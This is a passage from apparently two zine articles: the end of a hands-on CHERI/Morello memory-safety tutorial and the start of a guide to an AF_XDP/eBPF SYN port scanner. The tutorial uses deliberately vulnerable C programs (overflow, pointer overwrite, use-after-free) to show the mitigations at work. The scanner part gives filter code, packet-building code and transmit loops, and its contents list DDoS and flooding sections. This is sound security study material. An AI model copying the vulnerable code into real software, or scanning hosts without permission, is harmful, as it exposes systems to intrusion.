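/* Models `add cD, cN, #imm`: only the value moves, while the bounds and
 * the tag are carried over untouched. */
struct cap cap_add(struct cap c, int64_t imm) {
    c.value += (uint64_t)imm;
    return c;
}

/* Models `scbnds cD, cN, #len`: the new bounds are [value, value + len).
 * ASSUMPTION: asking for bounds that are not inside the old ones gives
 * back an untagged (invalid) capability, so bounds can only ever shrink. */
struct cap cap_set_bounds(struct cap c, uint64_t len) {
    uint64_t new_base  = c.value;
    uint64_t new_limit = c.value + len;

    if (new_base < c.base || new_limit > c.limit || new_limit < new_base)
        c.tag = false;
    c.base  = new_base;
    c.limit = new_limit;
    return c;
}
```

Starting from a stack capability whose value is `0xfffffff7fed0` (the stack
bounds themselves are invented for the example), `cap_add(csp, 32)`
followed by `cap_set_bounds(..., 16)` produces the same
`0xfffffff7fef0-0xfffffff7ff00` range that the program printed for
`buffer`. Trying to set 32-byte bounds on the result clears the tag.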

And with that, the rest of the disassembly of `overflow()` should largely
make more sense now! Just remember that for most instructions, there's
nothing particularly strange about the `c`-registers as the only thing that
matters is the "value" field. We only need to really consider the
capability nature of the values stored in registers when doing memory
operations. Taking a closer look at the crashed `stack` program in GDB we
can better understand what goes wrong:

root@cheribsd-morello-purecap:~/vuln # gdb -q ./stack --args stack 0123456789abcdef
Reading symbols from stack...
(gdb)  r
Starting program: /root/vuln/stack 0123456789abcdef
Calling overflow()
buffer @ 0xfffffff7fef0 [rwRW,0xfffffff7fef0-0xfffffff7ff00]

Program received signal SIGPROT, CHERI protection violation.
Capability bounds fault.
0x000000004037c7f8 in strcpy (to=0xfffffff7ff00 [rwRW,0xfffffff7fef0-
        0xfffffff7ff00] "q\375\367\277\377\377", from=<optimized out>)
    at /home/user/cheri/cheribsd/lib/libc/string/strcpy.c:48

(gdb) x/i $pcc
=> 0x4037c7f8 <strcpy+24>:  strb  w8, [c2], #1

(gdb) i r w8 c2
w8             0x0                 0
c2             0xdc5d40007f00fef00000fffffff7ff00 0xfffffff7ff00 [rwRW,
                   0xfffffff7fef0-0xfffffff7ff00]


We already knew to expect a crash in `strcpy()`, but looking at the exact
instruction that caused the CHERI fault we see that it's a store of the
byte `0x00` (the NUL byte at the end of the 16-character string we passed
as the program argument) to the capability in `c2`. Examining that
capability (which GDB helpfully expands for us) we see that the VALUE is
`0xfffffff7ff00`, but the BOUNDS are `0xfffffff7fef0-0xfffffff7ff00`, i.e.
we're trying to store a byte at the memory location that is just beyond the
range that our capability permits us to access!
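
The check that fired can be sketched in a few lines of C. Again this is a
software model with made-up names (`struct cap`, `cap_can_store_byte`,
`modelled_strcpy_fault`), it ignores permissions entirely, and it only
tracks where the first faulting store would happen rather than copying any
data.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Toy capability: value plus the [base, limit) range it may access. */
struct cap {
    uint64_t value;
    uint64_t base;
    uint64_t limit;
    bool     tag;
};

/* A one-byte store is allowed only through a tagged capability whose
 * value lies inside its bounds. */
bool cap_can_store_byte(const struct cap *c) {
    return c->tag && c->value >= c->base && c->value < c->limit;
}

/* Walks `src` the way strcpy() does, including the terminating NUL.
 * Returns the offset of the first store that would fault, or -1 if every
 * byte (NUL included) fits inside the bounds of `dst`. */
long modelled_strcpy_fault(struct cap dst, const char *src) {
    for (size_t i = 0;; i++) {
        if (!cap_can_store_byte(&dst))
            return (long)i;
        /* a real strcpy() would store src[i] through dst here */
        if (src[i] == '\0')
            return -1;
        dst.value++;  /* post-increment, like `strb w8, [c2], #1` */
    }
}
```

With the `buffer` capability from the output above, the argument `01234`
fits, while `0123456789abcdef` faults at offset 16: the sixteen characters
are stored fine and it is the trailing NUL that lands on `0xfffffff7ff00`.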

### Capability Overwrites

We can perhaps be a little craftier in our vulnerable program. Instead of
writing out-of-bounds, what if we intentionally write a program that lets
us modify a pointer? While this program might look silly, I expect many
people reading this have found themselves in a situation where their only
primitive was being able to partially overwrite a pointer. I'm going to
call this file `partial.c`.

#include <stdio.h>
#include <string.h>

void __attribute__((noinline)) some_func(void) {
    printf("inside some_func()\n");
}

int main(int argc, char** argv) {
    void (*func_ptr)(void) = &some_func;

    if (argc >= 2) {
        strcpy((char*)&func_ptr, argv[1]);
    }

    printf("Calling `func_ptr()` @ %#p\n", func_ptr);
    func_ptr();

    return 0;
}


Building this from our `vuln` directory with `./build.sh partial.c partial`
and hopping back into the CheriBSD VM, we can start exploring. This time
around, we'll explicitly keep our inputs small to avoid triggering an out-
of-bounds write. The size of `func_ptr` itself will be 16 bytes (because
it's a capability), so the capability `&func_ptr` that gets passed to
`strcpy()` will have a bounds of 16 bytes. Therefore we should keep our
inputs smaller than this to make sure we're exploring new functionality and
not running into the same crash that we had with `stack`.

Before diving straight in, let's think for a moment about what kind of
crash we should expect based on our current understanding. As explained
above, as long as we keep our inputs less than 16 bytes, we won't run into
the same error as with `./stack`. In fact, we should expect that the call
to `strcpy()` should return without any drama. However, the `strcpy()`
isn't without its importance this time around because it will have written
to a capability which we will then dereference by calling `func_ptr()` at
the end of `main()`.

If the memory controller is doing what it's supposed to, then it will have
cleared the tag bit from the capability corresponding to `func_ptr` when
`strcpy()` overwrites part of it. Okay, enough hypothesising - let's run
this without an argument to see the `func_ptr` capability before it gets
overwritten.

root@cheribsd-morello-purecap:~/vuln # ./partial
Calling `func_ptr()` @ 0x1108b1 [rxR,0x100000-0x130c80] (sentry)
inside some_func()


So the `func_ptr` capability has a value of `0x1108b1`, is valid for the
bounds `0x100000-0x130c80` and can be used to both read and fetch bytes (the
lower-case "rx") as well as read capabilities (the upper-case "R"). Now
let's run `partial` again but this time with an argument:

root@cheribsd-morello-purecap:~/vuln # ./partial A
Calling `func_ptr()` @ 0x110041 [rxR,0x100000-0x130c80] (invalid,sentry)
In-address space security exception (core dumped)


Aha! Notice how the low two bytes of the value field changed from `0x08b1`
to `0x0041` (in memory, the little-endian bytes `b1 08` became `41 00`) -
the "A" followed by a NUL that we passed as an argument successfully
overwrote the capability, but the tag bit got cleared in the process. Notice
how the `%#p` specifier helpfully adds the word "invalid" to the formatting
of the `func_ptr` capability now. If we wanted to, we could overwrite the
entirety of the `func_ptr` capability and STILL not be able to prevent the
tag bit from being cleared. No matter what we do in this example, modifying
the capability using user input forces the capability to be treated as
data.

In summary, the CPU once again threw an exception at us, but this time it
was ultimately because we tried to dereference the capability in `pcc`
(remember - this is the CHERI version of `pc`) after the tag bit had been
cleared. We were able to successfully return from `strcpy()` because we
didn't overflow the bounds of the capability that was used to write to the
`func_ptr` object. However, in doing so, the memory controller cleared the
corresponding tag bit for the `func_ptr` capability, meaning that it was no
longer valid! When we then tried to call `func_ptr()`, `pcc` still gets set
to the now invalid capability, but as soon as the CPU tries to fetch an
instruction from the address that `pcc` now points to, the exception gets
thrown.
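
The tag-clearing behaviour is easy to model in software. The sketch below
keeps one tag per 16-byte slot of a small byte array. Every name in it
(`struct tagged_mem`, `store_cap`, `store_byte`, `load_cap`) is invented
for the illustration, and only the 64-bit value half of a capability is
stored, in little-endian order.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define GRANULE 16  /* one tag bit per 16-byte capability slot */
#define SLOTS   4

struct tagged_mem {
    uint8_t bytes[SLOTS * GRANULE];
    bool    tag[SLOTS];
};

/* Capability store: writes the value little-endian, zeroes the (unmodelled)
 * metadata half and sets the tag for that slot. */
void store_cap(struct tagged_mem *m, size_t slot, uint64_t value) {
    assert(slot < SLOTS);
    for (size_t i = 0; i < GRANULE; i++)
        m->bytes[slot * GRANULE + i] = i < 8 ? (uint8_t)(value >> (8 * i)) : 0;
    m->tag[slot] = true;
}

/* Plain data store: the byte is written, and the tag of the slot it lands
 * in is cleared. */
void store_byte(struct tagged_mem *m, size_t addr, uint8_t b) {
    assert(addr < SLOTS * GRANULE);
    m->bytes[addr] = b;
    m->tag[addr / GRANULE] = false;
}

/* Capability load: returns the value and reports the slot's tag. */
uint64_t load_cap(const struct tagged_mem *m, size_t slot, bool *tag) {
    uint64_t v = 0;

    assert(slot < SLOTS);
    for (size_t i = 0; i < 8; i++)
        v |= (uint64_t)m->bytes[slot * GRANULE + i] << (8 * i);
    *tag = m->tag[slot];
    return v;
}
```

Storing `0x1108b1` with `store_cap()` and then writing the two bytes `'A'`
and `0x00` over the start of the same slot with `store_byte()` makes
`load_cap()` return `0x110041` with the tag cleared, which mirrors what
`./partial A` showed us.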

Pretty cool, huh? Hopefully these two examples demonstrate how CHERI can
help to mitigate two very common avenues of attack that academics refer to
as "spatial memory safety issues". Here, "spatial" refers to the fact that
we're modifying memory that we're not supposed to, "beyond the space/region
that the program expects". At this point, it's worth mentioning something
that's missing from this picture - if you've been following along at home
you might have already noticed it. If you run the second example above a
few times *without passing any argument*, you'll see the address of
`some_func` printed out a few times. Notice anything strange? That's
right - there's no ASLR on this system. The thought behind this appears to
be that because you can't forge capabilities, why does the memory layout
need to be randomised at all? Does knowing the virtual memory locations of
*anything* help you anymore with regards to exploitation? Are information
leaks still a concern (assuming you're only leaking capabilities)?

If you know anything about academics, then you're probably suspecting that
labeling something as "spatial memory safety" means that there's another
type of memory safety to think about. In our case, we should also consider
"temporal memory safety issues". These are vulnerabilities that occur when
the contents of memory change at different times in ways that the
programmer didn't intend, and therefore the *program* doesn't expect. Think
of things like use-after-free, or perhaps even type-confusion. Personally,
I'm not a fan of categorising memory corruption issues into these two camps
because I feel like there's too much grey area, but we'll proceed with it
for now as it's what the CHERI literature uses.

### Use-After-Free

If you've written a UAF exploit or similar in the past, then you'll know
that exploits in this realm depend heavily on the allocator due to the
objects of interest being on the heap (objects on the stack are typically
more "permanent" so are drastically less likely to have their contents
switched out from under the program's nose during execution). A CHERI
system is no exception and temporal memory protections come from the use of
a "CHERI-hardened" allocator [4]. The current research in this field
describes an allocator that employs a concept referred to as "quarantining"
to protect freed allocations from being reused.

The idea of a quarantining allocator is reasonably straightforward: when a
heap chunk is freed, it goes into a quarantine list where it cannot be
re-allocated. Later, the quarantine list can be cleaned up by removing the
tag bit from all the capabilities in the list before returning them to the
pool of free chunks.
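
As a rough model of that idea (and nothing like the real allocator), here
is a toy heap in C with fixed-size chunks. A `struct handle` stands in for
a capability, and the heap remembers every handle it has issued so that the
revocation pass has something to "scan". All of the names are invented for
this sketch.

```c
#include <stdbool.h>
#include <stddef.h>

#define NCHUNKS 8
#define MAXREFS 16

enum chunk_state { CHUNK_FREE, CHUNK_LIVE, CHUNK_QUARANTINED };

/* Stand-in for a capability: which chunk it points at, plus a tag. */
struct handle {
    int  chunk;
    bool tag;
};

struct toy_heap {
    enum chunk_state state[NCHUNKS];
    struct handle   *refs[MAXREFS];  /* every handle issued so far */
    size_t           nrefs;
};

/* Hands out the first FREE chunk; quarantined chunks are skipped. */
bool toy_malloc(struct toy_heap *h, struct handle *out) {
    if (h->nrefs == MAXREFS)
        return false;
    for (int i = 0; i < NCHUNKS; i++) {
        if (h->state[i] == CHUNK_FREE) {
            h->state[i] = CHUNK_LIVE;
            out->chunk = i;
            out->tag = true;
            h->refs[h->nrefs++] = out;
            return true;
        }
    }
    return false;
}

/* Freeing only quarantines the chunk; the handle keeps its tag. */
void toy_free(struct toy_heap *h, const struct handle *p) {
    if (p->tag && h->state[p->chunk] == CHUNK_LIVE)
        h->state[p->chunk] = CHUNK_QUARANTINED;
}

/* Revocation: untag every handle that points into quarantined memory,
 * then return the quarantined chunks to the free pool. */
void toy_revoke(struct toy_heap *h) {
    for (size_t i = 0; i < h->nrefs; i++)
        if (h->refs[i]->tag &&
            h->state[h->refs[i]->chunk] == CHUNK_QUARANTINED)
            h->refs[i]->tag = false;
    for (int i = 0; i < NCHUNKS; i++)
        if (h->state[i] == CHUNK_QUARANTINED)
            h->state[i] = CHUNK_FREE;
}
```

In this model an allocate, free, allocate sequence returns chunk 0 and then
chunk 1, and the stale handle to chunk 0 stays tagged until `toy_revoke()`
runs. Only after that does chunk 0 become available for reuse.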

In my view, I don't quite see why this idea of quarantining should be
preferred over zeroing memory as part of the free operation as this would
also have the added benefit of removing the tag bit from any capabilities
that were contained *within* the allocation (for example, if a struct
containing function pointers was allocated on the heap) and therefore
preventing legitimate capabilities from possibly being re-used at a later
time. Perhaps the reasoning is to do with memory latency again and the cost
of zeroing arbitrarily large memory regions during `free()`.

Let's see an example of the quarantining allocator in action:

#include <stdio.h>
#include <stdlib.h>

int main(void) {
    void* ptr = NULL;

    ptr = malloc(64);
    printf("ptr @ %#p\n", ptr);
    free(ptr);

    ptr = malloc(64);
    printf("ptr @ %#p\n", ptr);
    free(ptr);

    return 0;
}


On a non-CHERI system, we'd typically expect to see the same address
printed each time for `ptr`, despite the fact that we've free'd and
malloc'd in between the calls to `printf`. However, in our CheriBSD VM,
we see:

root@cheribsd-morello-purecap:~/vuln # ./heap1
ptr @ 0x40c0f000 [rwRW,0x40c0f000-0x40c0f040]
ptr @ 0x40c0f040 [rwRW,0x40c0f040-0x40c0f080]


Notice how the `ptr` capability changes - in fact the second capability is
always 64 bytes after the first. This is because, despite freeing `ptr`,
the memory it pointed to has been quarantined. The next time we try to
allocate something, we get the next free *non-quarantined* chunk which
happens to be immediately after the first chunk that we got.

How does any of this affect exploitation? Well, let's try to concoct a very
simple use-after-free example to see if and how CHERI complains to us:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {
    char* ptr1 = malloc(64);
    strcpy(ptr1, "CHERI1");
    free(ptr1);

    /* Leave this commented out for now; we'll come back to it afterwards */
    //malloc_revoke();

    char* ptr2 = malloc(64);
    strcpy(ptr2, "CHERI2");
    free(ptr2);

    printf("ptr1 @ %#p => %s\n", ptr1, ptr1);
    printf("ptr2 @ %#p => %s\n", ptr2, ptr2);

    return 0;
}


On a non-CHERI system, the behaviour of the above program depends on the
allocator. On my host system, the addresses allocated for both `ptr1` and
`ptr2` are the same, but contain junk data by the time `printf` is called.
On a different system with a different allocator, the strings `CHERI1` and
`CHERI2` might still be present. However, in the CheriBSD VM, we see:

root@cheribsd-morello-purecap:~/vuln # ./heap2
ptr1 @ 0x40c0f000 [rwRW,0x40c0f000-0x40c0f040] => CHERI1
ptr2 @ 0x40c0f040 [rwRW,0x40c0f040-0x40c0f080] => CHERI2


In particular, notice how `ptr1` and `ptr2` DO NOT have the same value
despite `ptr2` being allocated after `ptr1` was freed. This is the
quarantining allocator at work again. Notice also that the `CHERI1` and
`CHERI2` strings are still in place. This tells us that the call to
`free()` *doesn't clear the tag bit from the pointers that are passed to
it*.

If we now uncomment the call to `malloc_revoke()` between the two
allocations, we get a very different result:

root@cheribsd-morello-purecap:~/vuln # ./heap2
In-address space security exception (core dumped)


Uh, oh - something went wrong. Let's take a look in GDB to see what
happened.

root@cheribsd-morello-purecap:~/vuln # gdb -q ./heap2 heap2.core
Reading symbols from ./heap2...
[New LWP 100064]
Core was generated by `./heap2'.
Program terminated with signal SIGPROT, CHERI protection violation.
Capability tag fault.
#0  strlen (str=0x40c0f000 [rwRW,0x40c0f000-0x40c0f040] (invalid) "CHERI2")
    at /home/user/cheri/cheribsd/lib/libc/string/strlen.c:143


So what did that `malloc_revoke()` function do? This is a function
provided by the CHERI SDK that forces a cleanup of the quarantine list in
the allocator. This means that the capability corresponding to `ptr1` has
its tag bit cleared. From the CHERI man pages [5], `malloc_revoke()`
"triggers a full flush of the quarantine and scan of memory to ensure that
all references to memory previously quarantined by free(3) or realloc(3)
are revoked upon successful return". Ultimately, we can see that `strlen()`
was called (presumably by `printf()` due to the `%s` format specifier) with
an invalid capability.

## Where next?

I hope you've enjoyed this figurative toe-dip into CHERI, both as a concept
and through getting our hands dirty with some solid examples.
Personally, I think the platform has some solid design ideas that will
certainly make classic exploitation techniques harder. I'm hesitant to say
that any of those existing techniques have been rendered obsolete
because, as far as I'm aware, CHERI is yet to be battle tested as a
security mechanism on a target that's of significant interest to exploit
developers; like a flagship smartphone or a games console.

If you'd like to dive deeper into CHERI, then I recommend checking out the
Morello documentation more closely [2]. There's also the "CHERI Exercises"
repo on GitHub [6] by the CHERI team at Cambridge University which
highlights more scenarios where CHERI introduces new complications for
exploit writers. This article should give you a solid foundation to be able
to tackle those exercises.

Remember that CHERI doesn't stop at Morello with Aarch64! CHERI
specifications also exist for MIPS and RISC-V, with x86_64 in the works too.
In particular, there is the CHERIoT (CHERI Internet-Of-Things) project [7]
which uses the RISC-V CHERI extension to power an IoT platform. This
project makes extensive use of the compartmentalisation feature of CHERI
that I briefly mentioned earlier in the article. This is a method of
process isolation using sealed capabilities without having to separate
processes into different memory spaces.

It's also worth taking a look at the output of `./cheribuild.py
--list-targets` - there are already build definitions for things like
Apache, Nginx, KDE Plasma, Wayland, FFmpeg, and even DOOM!

## Closing Thoughts

First of all, if you've made it this far - thank you! I hope you found this
read worth your time and that you learnt something - even if it was just to
scratch that itch to understand a little better what this CHERI thing is
all about. That's certainly why I chose to take a look at it. If CHERI
takes off in the consumer space in the future, I think bug hunters and
xdevs alike will enjoy the new challenges posed by it. And if it doesn't
take off, then it will still remain an interesting experiment that we can
continue to play with in VMs.

Obligatory shoutouts go to netspooky, dnoiz, hermit, gren, srsns, bane,
remy, computeruser, zeta, chill, buses, rqu, iximeow, ilya, kyo and The
Binary Golf Association (you should go play Binary Golf [8]).

## Links and References



|=-----------------------------------------------------------------------=|
|=-------------=[ 5 - High-Performance Network Scanning ]=---------------=|
|=-------------------------=[ With AF_XDP ]=-----------------------------=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ c3l3si4n ]=------------------------------=|
|=-----------------------------------------------------------------------=|


-- Table of contents

0 - Introduction
1 - The Slow Path: Traditional Scanning Methods
    1.0 - Per-Connection Syscall Overhead
    1.1 - Inefficient Packet Filtering with AF_PACKET
2 - Kernel Bypass and Fastpath Architectures
    2.0 - Full Kernel Bypass: DPDK
    2.1 - The Kernel Fastpath: XDP
    2.2 - XDP Internals: Actions and Modes
    2.3 - AF_XDP: A Zero-Copy Bridge to Userspace
3 - Building the Scanner
    3.0 - Core Design
    3.1 - The eBPF Filter Component
    3.2 - The Userspace Application
        3.2.0 - Setup and Initialization
        3.2.1 - The Packet Transmission Loop
        3.2.2 - The Packet Reception Loop
4 - Performance Analysis
    4.0 - A Note on Benchmarking
    4.1 - Head-to-Head: AF_XDP vs. masscan
5 - Extending the AF_XDP Framework
    5.0 - High-Speed HTTP/HTTPS Application Fuzzing and L7 DDoS
    5.1 - Stateless UDP Fuzzing and DDoS Amplification
    5.2 - High-Entropy SYN Flooding
6 - Caveats and Considerations
7 - Conclusion
8 - References
9 - Source Code

--[ 0 - Introduction

The network scanner has always been a fundamental tool in my arsenal. As
network interface speeds have increased, I found my tools were constrained
by the overhead of the operating system's kernel network stack. This has
become a significant bottleneck when doing internet-scale scans.

In this article, I describe the method I used to build a high-performance
port scanner using the Linux kernel's eBPF and AF_XDP subsystems. This
approach creates a kernel fastpath that bypasses the traditional network
stack, allowing my application to interact more directly with the network
driver for line-rate filtering and zero-copy data transfer.


--[ 1 - The Slow Path: Traditional Scanning Methods

---[ 1.0 - Per-Connection Syscall Overhead

My work began by analyzing the conventional port scanning method, which
uses the connect() syscall. For each port, the application creates a socket,
initiates a TCP handshake, and waits for the kernel to report the outcome.
Every socket() and connect() call is a context switch into the kernel,
consuming CPU cycles and introducing significant latency, making it
impractical for my purposes.


---[ 1.1 - Inefficient Packet Filtering with AF_PACKET

I then examined raw sockets (AF_PACKET), which allow a userspace
application to receive raw link-layer frames, bypassing the kernel's
high-level network stack. While this is an improvement for SYN scanning,
it does not provide the performance of a true kernel bypass. Packets are
still delivered via the standard kernel data path, which involves overhead
from context switches and memory copies for every packet received by the
interface. This inherent slowness compared to a direct kernel bypass was
unacceptable for my goals.


--[ 2 - Kernel Bypass and Fastpath Architectures

---[ 2.0 - Full Kernel Bypass: DPDK

To achieve maximum performance, some frameworks like the Data Plane
Development Kit (DPDK) implement a full kernel bypass. They use custom
Poll-Mode Drivers (PMDs) that unbind a network interface from the kernel's
control, giving a userspace application exclusive access. While this is
very fast, it comes with drawbacks: it requires custom drivers, is invasive
to the system, and often requires pinning a CPU core at 100% utilization
for polling.


---[ 2.1 - The Kernel Fastpath: XDP

It is important to clarify that AF_XDP is not a kernel bypass in the same
vein as DPDK. It is a highly efficient kernel fastpath that works in
cooperation with existing kernel drivers. My XDP program is an eBPF program
attached to a low-level hook in the network driver, triggered for every
incoming packet at the earliest possible point.


---[ 2.2 - XDP Internals: Actions and Modes

Once my eBPF program is running at the XDP hook, it can inspect the raw
packet data and return a verdict that determines the packet's fate. The
primary actions are XDP_PASS, XDP_DROP, XDP_TX, and XDP_REDIRECT. The
XDP_REDIRECT action is what allows my program to forward a packet to an
AF_XDP socket in userspace.

You can load XDP programs in three modes, which affects performance:
- Native XDP: The program is loaded directly by a supported network card
  driver, providing the highest performance.
- Offloaded XDP: The program is offloaded to and executed directly on the
  NIC hardware, requiring specific SmartNICs.
- Generic XDP: The program is hooked later in the kernel's network path,
  after an sk_buff has been allocated. This mode serves as a fallback for
  testing or for use on unsupported hardware.


---[ 2.3 - AF_XDP: A Zero-Copy Bridge to Userspace

AF_XDP is the kernel feature I used to create a high-performance data path
between my XDP program and my userspace application. This is achieved
through a shared memory region called a UMEM, which I allocate in userspace
and register with the kernel. This UMEM is where all my packet data lives.
The communication is orchestrated by a set of four single-producer, single-
consumer rings:

- RX Ring: The kernel places descriptors here for incoming packets that my
  XDP program has redirected.
- TX Ring: I place descriptors here for packets I want to send. The kernel
  picks them up and transmits them.
- FILL Ring: I place descriptors for empty UMEM frames on this ring to give
  the buffers to the kernel for receiving new packets.
- COMPLETION Ring: After the kernel has sent a packet from my TX ring, it
  places the descriptor on this ring to signal that the UMEM frame can be
  reused.

This architecture allows me to shuttle packets back and forth with the NIC
driver while minimizing memory copies and context switches.
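
To illustrate the ring mechanics, here is a minimal single-producer,
single-consumer ring in plain C. It is a single-threaded sketch under my
own assumptions: `struct desc` is a simplified stand-in for the kernel's
descriptor format, the ring size is arbitrary, and the memory barriers that
a real shared ring needs between the producer and consumer are left out.

```c
#include <stdbool.h>
#include <stdint.h>

#define RING_SIZE 8u                 /* must be a power of two */
#define RING_MASK (RING_SIZE - 1u)

/* Simplified descriptor: offset of a frame inside the UMEM, plus length. */
struct desc {
    uint64_t addr;
    uint32_t len;
};

struct ring {
    uint32_t    producer;            /* advanced only by the producer */
    uint32_t    consumer;            /* advanced only by the consumer */
    struct desc slots[RING_SIZE];
};

/* Producer side: fails when all RING_SIZE slots are in flight. */
bool ring_produce(struct ring *r, struct desc d) {
    if (r->producer - r->consumer == RING_SIZE)
        return false;
    r->slots[r->producer & RING_MASK] = d;
    r->producer++;
    return true;
}

/* Consumer side: fails when the ring is empty. */
bool ring_consume(struct ring *r, struct desc *out) {
    if (r->producer == r->consumer)
        return false;
    *out = r->slots[r->consumer & RING_MASK];
    r->consumer++;
    return true;
}
```

The indices are free-running counters that are masked only when indexing
into `slots`, so "full" and "empty" can be told apart without wasting a
slot. For the TX and FILL rings the application is the producer, and for
the RX and COMPLETION rings it is the consumer.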


--[ 3 - Building the Scanner

---[ 3.0 - Core Design

My demonstration scanner is composed of two primary components: an eBPF+XDP
filter in C and a userspace packet sender in Go. The core design separates
the logic for efficiency. My eBPF filter is loaded onto the NIC to inspect
incoming TCP packets and redirect only the replies relevant to the scanner.
My Go application then manages the AF_XDP socket, populates the FILL ring,
sends SYN packets via the TX ring, and processes the replies from the RX
ring. This division of labor places the performance-critical filtering in
the kernel, while I handle the more complex state and I/O logic in
userspace.

---[ 3.1 - The eBPF Filter Component

My eBPF code is designed for efficiency and simplicity.

// file: bpf/xdp_filter.c
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_endian.h>   // bpf_htons()
#include <linux/if_ether.h>
#include <linux/in.h>         // IPPROTO_TCP
#include <linux/ip.h>
#include <linux/tcp.h>

// This MUST match the -srcport flag in my Go program.
#define FILTER_PORT 54321

// Map to hold the file descriptor of my AF_XDP socket.
struct {
        __uint(type, BPF_MAP_TYPE_XSKMAP);
        __uint(key_size, sizeof(__u32));
        __uint(value_size, sizeof(__u32));
        __uint(max_entries, 1);
} xsks_map SEC(".maps");

SEC("xdp")
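int xdp_port_filter(struct xdp_md *ctx) {
    void *data_end = (void *)(long)ctx->data_end;
    void *data = (void *)(long)ctx->data;
    struct ethhdr *eth = data;
    struct iphdr *ip = data + sizeof(*eth);
    struct tcphdr *tcp;

    // This single bounds check covers the Ethernet and fixed IPv4 headers.
    if ((void *)ip + sizeof(*ip) > data_end)
        return XDP_PASS;

    // Anything that is not IPv4 does not have the layout parsed below.
    if (eth->h_proto != bpf_htons(ETH_P_IP))
        return XDP_PASS;

    if (ip->protocol != IPPROTO_TCP)
        return XDP_PASS;

    // ihl is the header length in 32-bit words; below 5 is malformed.
    if (ip->ihl < 5)
        return XDP_PASS;

    tcp = (void *)ip + ip->ihl * 4;
    if ((void *)tcp + sizeof(*tcp) > data_end)
        return XDP_PASS;

    // Only replies addressed to the scanner's source port are redirected.
    if (tcp->dest == bpf_htons(FILTER_PORT))
        return bpf_redirect_map(&xsks_map, 0, 0);

    return XDP_PASS;
}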



---[ 3.2 - The Userspace Application

The PoC Go application orchestrates the entire scanning process.

----[ 3.2.0 - Setup and Initialization

Before any packets fly, a sequence of setup steps must be performed.
First, I parse the arguments for the interface, targets, and ports. Then,
I load my compiled xdp_filter.o program and attach it to the specified
interface. The core setup involves creating the AF_XDP socket, then
allocating and registering the UMEM via the XDP_UMEM_REG setsockopt call.
Following that, I set the sizes of the four rings and mmap them into my
application's address space. With the socket ready, I register its file
descriptor into the eBPF map so the kernel knows where to redirect packets.
Finally, since my tool operates at Layer 2, I must manually resolve the
gateway's MAC address via ARP.
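
As an illustration of that last step, the following Python sketch builds
the raw ARP request frame that such a tool has to put on the wire itself.
It is not the Go code from the PoC; the function name and the example
addresses (a locally administered MAC and documentation-range IPs) are
assumptions. The field layout is the standard Ethernet/IPv4 ARP format.

```python
import socket
import struct


def build_arp_request(src_mac: bytes, src_ip: str, target_ip: str) -> bytes:
    """Return a 42-byte Ethernet frame asking who has target_ip."""
    broadcast = b"\xff" * 6
    eth = broadcast + src_mac + struct.pack("!H", 0x0806)  # EtherType ARP
    arp = struct.pack(
        "!HHBBH6s4s6s4s",
        1,                         # hardware type: Ethernet
        0x0800,                    # protocol type: IPv4
        6,                         # hardware address length
        4,                         # protocol address length
        1,                         # opcode: request
        src_mac,                   # sender MAC
        socket.inet_aton(src_ip),  # sender IP
        b"\x00" * 6,               # target MAC, unknown at this point
        socket.inet_aton(target_ip),
    )
    return eth + arp


# Hypothetical addresses, for illustration only.
frame = build_arp_request(bytes.fromhex("020000000001"),
                          "192.0.2.10", "192.0.2.1")
```

The gateway's answer carries its MAC in the sender hardware address field
of the reply, which then becomes the destination MAC of every SYN frame.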


----[ 3.2.1 - The Packet Transmission Loop

Instead of sending packets one by one, we can send packets in large batches
to amortize the cost of syscalls.

// file: cmd/portscanner/main.go (conceptual)
// A template packet is pre-crafted to avoid building each packet from
// scratch
packer, _ := newSynPacker(srcMAC, gatewayMAC, srcIP, srcPort)

// Ensure COMPLETION ring is checked to reclaim UMEM frames for reuse
check_completion_ring_and_refill_umem();

for outstandingCount > 0 {
    numFree := xsk.NumFreeTxSlots()
    if numFree > 0 {
        descs := xsk.GetDescs(min(numFree, BATCH_SIZE), false)
        for i := range descs {
            target := getNextTarget()
            frame := xsk.GetFrame(descs[i]) // Pointer to shared memory
            packer.pack(frame, target.ip, target.port, randomSeq())
            descs[i].Len = pktLen
        }
        xsk.Transmit(descs)
    }
}
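
What the packer has to produce for every target can be sketched in Python
as follows. This is a stand-alone illustration, not the PoC's Go packer:
`build_syn`, `checksum` and the example addresses are assumptions, and a
real template-based packer would only patch the destination, sequence
number and checksums instead of rebuilding the whole frame.

```python
import socket
import struct


def checksum(data: bytes) -> int:
    """Internet checksum (RFC 1071) over data."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_syn(src_mac, dst_mac, src_ip, dst_ip, src_port, dst_port, seq):
    """Return an Ethernet + IPv4 + TCP SYN frame (54 bytes, no options)."""
    src = socket.inet_aton(src_ip)
    dst = socket.inet_aton(dst_ip)
    eth = dst_mac + src_mac + struct.pack("!H", 0x0800)

    # TCP header: data offset 5 words, SYN flag (0x02), checksum zero.
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, seq, 0,
                      5 << 4, 0x02, 65535, 0, 0)
    # The TCP checksum also covers a pseudo header with both addresses.
    pseudo = src + dst + struct.pack("!BBH", 0, socket.IPPROTO_TCP, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]

    # IPv4 header: version 4, IHL 5, TTL 64, no options.
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0,
                     64, socket.IPPROTO_TCP, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return eth + ip + tcp


# Hypothetical MACs and source address, for illustration only.
syn = build_syn(bytes.fromhex("020000000001"), bytes.fromhex("020000000002"),
                "192.0.2.10", "45.33.32.156", 54321, 80, 0x01020304)
```

The source port used here is the same value the eBPF filter matches on,
which is how replies find their way back to the AF_XDP socket.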



----[ 3.2.2 - The Packet Reception Loop

My receive loop, running in a dedicated goroutine, can be simple because
the eBPF program has already handled the filtering.

// file: cmd/portscanner/main.go (conceptual)
// Pre-populate the FILL ring with available UMEM frames
populate_fill_ring();

for {
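    numRx, _, err := xsk.Poll(10) // 10ms timeout
    if err != nil {
        break // conceptual: a real loop would log or retry here
    }
    if numRx > 0 {
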